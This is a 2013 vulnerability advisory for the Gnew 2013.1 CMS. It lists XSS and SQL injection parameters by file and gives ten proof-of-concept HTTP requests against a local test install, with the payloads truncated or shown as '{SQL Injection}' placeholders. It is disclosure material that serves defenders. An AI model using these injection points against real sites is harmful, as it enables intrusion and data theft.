Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities Vendor: Raoul Proença Product web page: http://www.gnew.fr Affected version: 2013.1 Summary: Gnew is a simple Content Management System written with PHP language and using a database server (MySQL, PostgreSQL or SQLite) for storage. Desc: Input passed via several parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and HTML/script code in a user's browser session in context of an affected site. ============================================================================================ | PARAM | TYPE | FILE | ============================================================================================ | | | gnew_template | XSS | /users/profile.php, /articles/index.php, /admin/polls.php | |------------------------------------------------------------------------------------------| | category_id | XSS | /news/submit.php | |------------------------------------------------------------------------------------------| | news_id | XSS, SQLi | /news/send.php, /comments/add.php | |------------------------------------------------------------------------------------------| | post_subject | XSS | /posts/edit.php | |------------------------------------------------------------------------------------------| | thread_id | XSS, SQLi | /posts/edit.php | |------------------------------------------------------------------------------------------| | user_email | SQLi | /users/register.php, /users/password.php | | | ============================================================================================ Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.7 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5153 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php 23.07.2013 --- #1 [xss] GET /gnew/users/profile.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/admin/index.php Cookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean"> Connection: keep-alive #2 [xss] POST /gnew/news/submit.php HTTP/1.1 Content-Length: 112 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1">&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit #3 [xss] POST /gnew/news/send.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate friend_email=lab@zeroscience.mk&html_email=1&news_id=572">&send=Send&user_email=root@att.com&user_name=admin #4 [xss] POST /gnew/comments/add.php HTTP/1.1 Content-Length: 96 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate add=Add&comment_subject=1&comment_text=1&news_id=574">&preview=Preview #5 [sqli] POST /gnew/news/send.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate friend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin #6 [xss] POST /gnew/posts/edit.php HTTP/1.1 Content-Length: 153 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl">&post_text=test&preview_edited=Preview&thread_id=6 #7 [xss] POST /gnew/posts/edit.php HTTP/1.1 Content-Length: 184 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6"> #8 [sqli] POST /gnew/posts/edit.php HTTP/1.1 Host: localhost Content-Length: 127 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:80/gnew/ Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection} #9 [sqli] POST /gnew/users/password.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/users/password.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 user_name=test&user_email={SQL Injection}&password=Send #10 [sqli] POST /gnew/users/register.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/gnew/users/password.php Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 user_name=test&user_email={SQL Injection}&password=Send # Iranian Exploit DataBase = http://IeDb.Ir [2013-08-12]